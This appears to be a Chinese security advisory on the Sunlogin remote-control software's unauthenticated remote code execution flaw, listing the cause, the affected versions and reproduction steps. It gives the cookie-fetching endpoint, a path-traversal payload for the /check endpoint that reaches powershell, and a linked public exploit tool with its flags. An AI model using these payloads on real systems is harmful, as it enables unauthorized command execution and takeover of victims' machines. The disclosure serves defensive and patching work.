新闻公告

向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)

2022-07-04
浏览次数:
返回列表

1.漏洞原理:


向日葵本是一款远程控制工具,可远程控制电脑手机等。漏洞成因主要是低版本下存在未授权访问漏洞,当你打开先日葵(旧版)后,未授权的端口自然也被打开,然而攻击者可以通过此端口不需要密码获取session,借助session远程执行任意命令,进而获取服务器权限。


2.影响版本:


向日葵个人版 windows 11.0.0.33以下(包含0.33)


向日葵简约版 windows V1.0.1.43315 (2021.12)


3.漏洞复现:


3.1.手工复现


3.1.1.打开向日葵,cmd执行tasklist查看进程信息,发现三个进程号与向日葵有关


370f1e23d95f4aeb8b1d6333b3e7ea86.png


3.1.2.cmd执行 netstat -ano | findstr PID 对进程逐一排查

fc4a8113baa447ee87872f95e6d97817.png



3.1.3.端口扫描器对本机IP进行扫描


9c0d314ff0e8426b9951f8227aef6a76.png


3.1.4.发现端口开放在0.0.0.0上


78f75429a010449f874307867cb63efb.png


3.1.5.访问http://本机ip:1138

c24e929bde574cad992b3b8ac3c271ff.png



3.1.6.获取cookie,url后面加上 /cgi-bin/rpc?action=verify-haras


访问http://本机ip:1138/cgi-bin/rpc?action=verify-haras


2aacba893c9740e2bab8a8c524f6e593.png


3.1.7.构造payload,漏洞发生在接口/check处,当参数cmd的值以ping或者nslookup开头时可以构造命令实现远程命令执行


  1. http://本机ip:1138/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell


  3. http://本机ip:1138/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell

3.1.8.用burpsuite工具进行抓包,请求包中添加获取的cookie

f08f6089bd5340b18e3c5977b55745a4.png


ff1ccc9c1ecf46b6b216f0ca8fad4753.png



3.1.9.进而获取到命令执行的结果

837a82d627fc45faab3572727bdd531a.png


3.2.工具复现


3.2.1.工具下载地址:https://github.com/Mr-xn/sunlogin_rce 内置旧版本向日葵(漏洞版)


60b7afcc1d294a29af5e610a271e1bc1.png


工具说明:


  1. -h 指定目标


  3. -t 选择扫描或者命令执行 默认scan


  5. -p 设置扫描端口范围 默认4w到65535


  7. -c 需要执行的命令

7d76a5a8cff744bbb95987e6539059de.png


上一篇:钉钉电脑版远程代码执行漏洞 安全风险通告
下一篇:远程软件漏洞通知

搜索